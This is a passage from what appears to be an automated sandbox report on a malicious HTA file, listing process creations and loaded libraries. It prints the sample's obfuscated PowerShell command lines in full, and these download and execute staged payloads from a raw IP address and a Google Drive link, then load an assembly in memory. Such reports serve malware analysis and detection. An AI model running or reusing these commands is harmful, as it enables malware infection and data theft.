              Source: 5A09.tmp.19.dr, 5D77.tmp.19.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.htaReversingLabs: Detection: 18%
              Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.htaVirustotal: Detection: 27%
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\wihaduv C:\Users\user\AppData\Roaming\wihaduv
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4232 -s 704
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
